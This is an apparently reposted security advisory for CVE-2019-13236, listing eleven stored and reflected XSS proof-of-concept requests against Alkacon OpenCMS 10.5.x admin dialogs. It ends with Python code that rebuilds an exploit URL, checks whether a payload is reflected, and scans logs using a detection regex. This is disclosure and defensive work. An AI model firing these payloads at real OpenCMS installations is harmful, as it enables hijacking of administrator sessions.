Alkacon OpenCMS 10.5.x Cross Site Scripting

  • Alkacon OpenCMS version 10.5.x suffers from multiple stored and reflected cross site scripting vulnerabilities in its workplace administration functionality, including the site management, account management, search index and html import dialogs.
    MD5 | 675ae0b7a5129ab86f65c89e2dd22a5a

    # Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Alkacon OpenCms Site Management  
    # Google Dork: N/A  
    # Date: 18/07/2019  
    # Exploit Author: Aetsu  
    # Vendor Homepage: http://www.opencms.org  
    # Software Link: https://github.com/alkacon/opencms-core  
    # Version: 10.5.x  
    # Tested on: 10.5.5 / 10.5.4  
    # CVE : CVE-2019-13236  
    1. In Site Management > New site (Stored XSS):  
    - Affected resource title.0:  
    POC:  
    

    POST /system/workplace/admin/sites/new.jsp HTTP/1.1
    Host: example.com
    title.0=%3Csvg+onload%3Dalert%28%27Title%27%29%3E&sitename.0=%3Csvg+onload%3Dalert%28%27Folder+name%27%29%3E&se

    2. In Treeview (Reflected XSS):  
    - Affected resource type:  
    POC:  
    

    http://example.com/opencms/system/workplace/views/explorer/tree_fs.jsp?type=</script><script>confirm(1)</script>&includefiles=true&showsiteselector=true&projectaware=false&treesite=

    3. In Workspace tools > Login message (Stored XSS):  
    - Affected resource message.0:  
    POC:  
    

    POST /system/workplace/admin/workplace/loginmessage.jsp HTTP/1.1
    Host: example.com
    enabled.0=true&enabled.0.value=true&message.0=<svg onload=alert(1)>&loginForbidden.0.value=false&ok=Ok&elementname=undefined&path=%252Fworkplace%252Floginmessage&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace&style=new&page=page1&framename=

    4. In Index sources > View index sources > New index source (Stored XSS):  
    - Affected resource name.0:  
    POC:  
    

    POST /system/workplace/admin/searchindex/indexsource-new.jsp HTTP/1.1
    Host: example.com
    name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&indexerClassName.0=org.opencms.search.CmsVfsIndexer&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Findexsources%252Findexsource-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Findexsources%2526action%253Dinitial&style=new&page=page1&framename=

    5. In Index sources > View field configuration > New field configuration  
    (Stored XSS):  
    - Affected resource name.0:  
    POC:  
    

    POST /system/workplace/admin/searchindex/fieldconfiguration-new.jsp HTTP/1.1
    Host: example.com
    name.0=%3Csvg+onload%3Dalert%28%27Name%27%29%3E&ok=Ok&elementname=undefined&path=%252Fsearchindex%252Ffieldconfigurations%252Ffieldconfiguration-new&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fsearchindex%252Ffieldconfigurations%2526action%253Dinitial&style=new&page=page1&framename=

    6. In Account Management > Import/Export user data (Reflected XSS):  
    - Affected resource oufqn:  
    POC:  
    

    POST /system/workplace/admin/accounts/imexport_user_data/export_csv.jsp HTTP/1.1
    Host: example.com
    groups.0=Users&ok=Ok&oufqn=</script><script>confirm(1)</script>&elementname=undefined&path=%252Faccounts%252Forgunit%252Fimexport%252Fexportcsv&elementindex=0&action=save&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Faccounts%252Forgunit%252Fimexport%2526action%253Dinitial&style=new&page=page1&framename=

    7. In Account Management > Group Management > New Group (Stored XSS):  
    - Affected resources name.0 and description.0:  
    POC:

    POST /system/workplace/admin/accounts/group_new.jsp HTTP/1.1  
    Host: example.com  
    name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Description%27  
    
    8. In Account Management > Organizational Unit > Organizational Unit Management > New sub organizational unit (Stored XSS):  
    - Affected resources parentOuDesc.0 and resources.0:  
    POC:

    POST /system/workplace/admin/accounts/unit_new.jsp HTTP/1.1
    Host: example.com
    name.0=%3Cimg+src%3D.+onerror%3Dalert%28%27Name%27%29%3E&description.0=%3Cimg+src%3D.+onerror%3Dalert%28%27D
    9. In Link Validator > External Link Validator > Validate External Links  
    (Reflected XSS):  
    - Affected resources reporttype, reportcontinuekey and title:  
    POC:

    POST /system/workplace/views/admin/admin-main.jsp?path=%2Flinkvalidation%2Fexternal%2Fvalidateexternallinks HTTP/1.1
    Host: example.com
    dialogtype=imp&reporttype=extended66955%22%3balert(1)%2f%2f297&reportcontinuekey=&title=External%2BLink%2BValidation&path=%252Flinkvalidation%252Fexternal%252Fvalidateexternallinks&threadhasnext=&action=confirmed&closelink=%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Flinkvalidation%252Fexternal&style=new&framename=&ok=OK
    
    10. In Administrator view > Database management > Extended html import > Default html values (Reflected XSS):  
    - Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and downloadGallery.0:  
    POC:

    POST /system/workplace/admin/database/htmlimport/htmldefault.jsp HTTP/1.1
    Host: example.com
    ------WebKitFormBoundaryLyJOmAtrd8ArxNqf
    Content-Disposition: form-data; name="inputDir.0"
    .
    ------WebKitFormBoundaryLyJOmAtrd8ArxNqf
    Content-Disposition: form-data; name="destinationDir.0"
    /whbo0"><script>alert(1)</script>nrbhd
    ------WebKitFormBoundaryLyJOmAtrd8ArxNqf
    Content-Disposition: form-data; name="imageGallery.0"
    ------WebKitFormBoundaryLyJOmAtrd8ArxNqf
    Content-Disposition: form-data; name="downloadGallery.0"
    ------WebKitFormBoundaryLyJOmAtrd8ArxNqf
    Content-Disposition: form-data; name="linkGallery.0"
    [...]
    11. In Administrator view > Database management > Extended html import >  
    Default html values (Reflected XSS):  
    - Affected resources destinationDir.0, imageGallery.0, linkGallery.0 and  
    downloadGallery.0:  
    POC:  
    

    POST /system/workplace/admin/database/htmlimport/htmlimport.jsp HTTP/1.1
    Host: example.com
    ------WebKitFormBoundary6fy3ENawtXT0qmgB
    Content-Disposition: form-data; name="inputDir.0"
    gato
    ------WebKitFormBoundary6fy3ENawtXT0qmgB
    Content-Disposition: form-data; name="destinationDir.0"
    testszfgw"><script>alert(1)</script>vqln7
    ------WebKitFormBoundary6fy3ENawtXT0qmgB
    Content-Disposition: form-data; name="imageGallery.0"
    test
    ------WebKitFormBoundary6fy3ENawtXT0qmgB
    Content-Disposition: form-data; name="downloadGallery.0"
    test
    ------WebKitFormBoundary6fy3ENawtXT0qmgB
    Content-Disposition: form-data; name="linkGallery.0"
    test
    [...]

    Extended POCs: https://aetsu.github.io/OpenCms  
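Two checks a practitioner would want alongside these PoCs, as an added example that is not part of the advisory and not OpenCms code: a reflection classifier that tells an exploitable verbatim echo of the item-2 payload apart from an HTML-escaped one, and an access-log scan that flags requests to the endpoints listed above whose decoded query string carries a tag or event-handler fragment. The endpoint paths, parameter names and payload are taken from the advisory; the host name, the two response bodies and the log lines are constructed for the example, and the "hardened" body only illustrates output encoding that stops `</script>` from closing the block.

```python
"""Offline checks for the OpenCms workplace XSS issues listed in the advisory.

Added example, not code from the advisory or from OpenCms: endpoint paths,
parameter names and the item-2 payload come from the advisory; the host name,
sample responses and sample log lines are constructed here.
"""
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Endpoints and parameters named in the advisory, keyed by path without the
# "/opencms" context root (the GET PoC includes it, the POST PoCs do not).
WORKPLACE_ENDPOINTS = {
    "/system/workplace/admin/sites/new.jsp": ["title.0", "sitename.0"],
    "/system/workplace/views/explorer/tree_fs.jsp": ["type"],
    "/system/workplace/admin/workplace/loginmessage.jsp": ["message.0"],
    "/system/workplace/admin/searchindex/indexsource-new.jsp": ["name.0"],
    "/system/workplace/admin/searchindex/fieldconfiguration-new.jsp": ["name.0"],
    "/system/workplace/admin/accounts/imexport_user_data/export_csv.jsp": ["oufqn"],
    "/system/workplace/admin/accounts/group_new.jsp": ["name.0", "description.0"],
    "/system/workplace/admin/accounts/unit_new.jsp": ["name.0", "description.0"],
    "/system/workplace/views/admin/admin-main.jsp": ["reporttype", "reportcontinuekey", "title"],
    "/system/workplace/admin/database/htmlimport/htmldefault.jsp":
        ["destinationDir.0", "imageGallery.0", "linkGallery.0", "downloadGallery.0"],
    "/system/workplace/admin/database/htmlimport/htmlimport.jsp":
        ["destinationDir.0", "imageGallery.0", "linkGallery.0", "downloadGallery.0"],
}

# Payload from item 2: it closes the <script> block the parameter is echoed into.
TREE_FS_PAYLOAD = "</script><script>confirm(1)</script>"


def build_tree_fs_url(host, payload=TREE_FS_PAYLOAD):
    """Rebuild the item-2 URL with the payload URL-encoded (the advisory shows it raw)."""
    query = urlencode({"type": payload, "includefiles": "true",
                       "showsiteselector": "true", "projectaware": "false",
                       "treesite": ""})
    return f"http://{host}/opencms/system/workplace/views/explorer/tree_fs.jsp?{query}"


def classify_reflection(payload, body):
    """'unencoded' if the payload is echoed verbatim (exploitable), 'encoded' if
    only its HTML-escaped form appears, 'absent' if it is not echoed at all."""
    if payload in body:
        return "unencoded"
    if html.escape(payload) in body:
        return "encoded"
    return "absent"


# Constructed responses: the vulnerable shape (parameter dropped into a JS
# string inside <script>) and a hardened one where the value is HTML-escaped,
# so "</script>" can no longer terminate the block.
VULNERABLE_BODY = ('<html><head><script>\nvar type = "' + TREE_FS_PAYLOAD +
                   '";\n</script></head><body></body></html>')
HARDENED_BODY = ('<html><head><script>\nvar type = "' + html.escape(TREE_FS_PAYLOAD) +
                 '";\n</script></head><body></body></html>')

# Tag / event-handler fragments shared by the svg, img and script payloads above.
# Item 9's "\";alert(1)//" breaks out of a JS string and would need its own pattern.
XSS_MARKERS = re.compile(r"<\s*(script|svg|img)\b|\bon(load|error)\s*=", re.IGNORECASE)


def suspicious_requests(log_lines):
    """Flag requests to the advisory's endpoints whose decoded query string
    carries an XSS marker. Access logs hold only the query string, so this
    catches the item-2 GET PoC; the POST bodies of the other items are not logged."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        path = re.sub(r"^/opencms", "", parts.path)
        if path not in WORKPLACE_ENDPOINTS:
            continue
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:  # parse_qs already URL-decodes
                if XSS_MARKERS.search(value):
                    hits.append((path, name, value))
    return hits


# Constructed access-log lines (combined log format); the first carries the item-2 payload.
SAMPLE_LOG = [
    '10.0.0.5 - admin [18/Jul/2019:10:00:00 +0000] "GET /opencms/system/workplace/views/explorer/'
    'tree_fs.jsp?type=%3C%2Fscript%3E%3Cscript%3Econfirm%281%29%3C%2Fscript%3E&includefiles=true HTTP/1.1" 200 1200',
    '10.0.0.5 - admin [18/Jul/2019:10:00:05 +0000] "GET /opencms/system/workplace/views/explorer/'
    'tree_fs.jsp?type=folder&includefiles=true HTTP/1.1" 200 1200',
    '10.0.0.7 - - [18/Jul/2019:10:01:00 +0000] "GET /opencms/index.html HTTP/1.1" 200 500',
]

if __name__ == "__main__":
    print(build_tree_fs_url("example.com"))
    print("vulnerable:", classify_reflection(TREE_FS_PAYLOAD, VULNERABLE_BODY))
    print("hardened:", classify_reflection(TREE_FS_PAYLOAD, HARDENED_BODY))
    for hit in suspicious_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

To use the classifier against a live target, fetch the URL from `build_tree_fs_url` with an authenticated workplace session and pass the response body to `classify_reflection`; "unencoded" reproduces the finding, "encoded" or "absent" means the echo is no longer exploitable at that point, though the stored variants still need their own dialog-by-dialog check.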
    

    Source: packetstormsecurity.com
